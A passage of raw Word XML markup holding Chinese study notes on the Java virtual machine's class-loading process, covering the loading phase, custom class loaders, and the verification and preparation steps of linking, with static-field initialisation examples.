          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.lang.Class</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，作为方法区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个类的各种数据的访问入口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E20DF9" w:rsidRDefault="00E20DF9" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:hangingChars="50" w:hanging="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一条</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并没有指明从哪里获取类的二进制字节流、怎么样获取，可以从</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ZIP</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取、从网络中获取、运行时计算生成（动态代理</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）、从其他文件生成（</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用生成对应的</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidR="00D52C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类）、从数据库获取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E64748" w:rsidRDefault="00E64748" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:hangingChars="50" w:hanging="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00344B46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相对于类加载机制的其它阶段，一个</w:t>
      </w:r>
      <w:r w:rsidR="00344B46" w:rsidRPr="00344B46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非数组类的加载阶段</w:t>
      </w:r>
      <w:r w:rsidR="00344B46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是开发人员可控性最强的。可以有系统的类加载器加载，也可以自定义类加载器来控制字节流的获取方式（即</w:t>
      </w:r>
      <w:r w:rsidR="00344B46" w:rsidRPr="00EE7973">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重写一个类加载器的</w:t>
      </w:r>
      <w:r w:rsidR="00344B46" w:rsidRPr="00EE7973">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>loadClass()</w:t>
      </w:r>
      <w:r w:rsidR="00344B46" w:rsidRPr="00EE7973">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidR="00344B46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00EE7973">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2D46" w:rsidRPr="00CB2D46" w:rsidRDefault="00CB148F" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:hangingChars="50" w:hanging="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB148F" w:rsidRDefault="00CB148F" w:rsidP="00CB148F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB148F" w:rsidRDefault="00CB148F" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A1074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节流是否符合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件格式的规范，文件格式验证、元数据验证、字节码验证。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB148F" w:rsidRDefault="00CB148F" w:rsidP="00CB148F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>准备</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB148F" w:rsidRDefault="00CB148F" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CA20DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F4780" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为类的静态变量分配存储空间</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F4780" w:rsidRDefault="009F4780" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CA20DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public static int value = 123;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F4780" w:rsidRDefault="009F4780" w:rsidP="009F4780">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:hangingChars="50" w:hanging="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CA20DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通常情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在准确阶段初始值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，因为这时候尚未开始执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F4780" w:rsidRDefault="00CA20DA" w:rsidP="009F4780">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:firstLine="315"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public static </w:t>
      </w:r>
      <w:r w:rsidR="009F4780" w:rsidRPr="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> int value = 123;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F4780" w:rsidRDefault="006810FF" w:rsidP="009F4780">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:firstLine="315"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F4780" w:rsidRPr="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果类</w:t>
      </w:r>
      <w:r w:rsidR="00A10BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>静态变量</w:t>
      </w:r>
      <w:r w:rsidR="009F4780" w:rsidRPr="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的字段属性表存在</w:t>
      </w:r>
      <w:r w:rsidR="009F4780" w:rsidRPr="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ConstantValue</w:t>
      </w:r>
      <w:r w:rsidR="009F4780" w:rsidRPr="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性，</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么在准备阶段</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
